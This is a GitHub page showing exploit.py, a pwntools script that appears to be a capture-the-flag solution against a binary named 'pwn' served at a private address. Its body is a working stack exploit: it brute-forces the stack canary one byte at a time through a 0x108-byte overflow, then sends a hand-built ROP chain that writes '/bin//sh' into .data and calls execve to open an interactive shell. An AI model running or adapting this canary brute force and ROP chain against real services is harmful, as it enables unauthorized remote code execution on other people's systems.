-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
49 lines (44 loc) · 1.64 KB
/
exploit.py
File metadata and controls
49 lines (44 loc) · 1.64 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwn import *
# elf = ELF("./pwn1")
elf = ELF("./dockerfile/bin/pwn")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
# p = process([elf.path])
p = remote('192.168.45.46', 10002)
pause()
canary = b'\x00'
while len(canary) < 8:
info(len(canary))
for c in range(0x100):
p.sendafter("please input:\n", b"a" * 0x108 + canary + p8(c))
# pause()
if not p.recvline_contains('stack smashing detected', timeout=1):
canary += p8(c)
break
canary = u64(canary)
success("canary: " + hex(canary))
# payload = b''
payload = b'a' * 0x108 + p64(canary)
payload += b'b' * 8
payload += p64(0x000000000040f23e) # pop rsi ; ret
payload += p64(0x00000000004c10e0) # @ .data
payload += p64(0x00000000004493d7) # pop rax ; ret
payload += b'/bin//sh'
payload += p64(0x000000000047c4e5) # mov qword ptr [rsi], rax ; ret
payload += p64(0x000000000040f23e) # pop rsi ; ret
payload += p64(0x00000000004c10e8) # @ .data + 8
payload += p64(0x00000000004437a0) # xor rax, rax ; ret
payload += p64(0x000000000047c4e5) # mov qword ptr [rsi], rax ; ret
payload += p64(0x00000000004018c2) # pop rdi ; ret
payload += p64(0x00000000004c10e0) # @ .data
payload += p64(0x000000000040f23e) # pop rsi ; ret
payload += p64(0x00000000004c10e8) # @ .data + 8
payload += p64(0x00000000004017cf) # pop rdx ; ret
payload += p64(0x00000000004c10e8) # @ .data + 8
payload += p64(0x00000000004437a0) # xor rax, rax ; ret
payload += p64(next(elf.search(asm('pop rax;ret'), executable=True)))
payload += p64(59)
payload += p64(next(elf.search(asm('syscall'), executable=True)))
pause()
p.sendafter("please input:\n", payload)
p.interactive()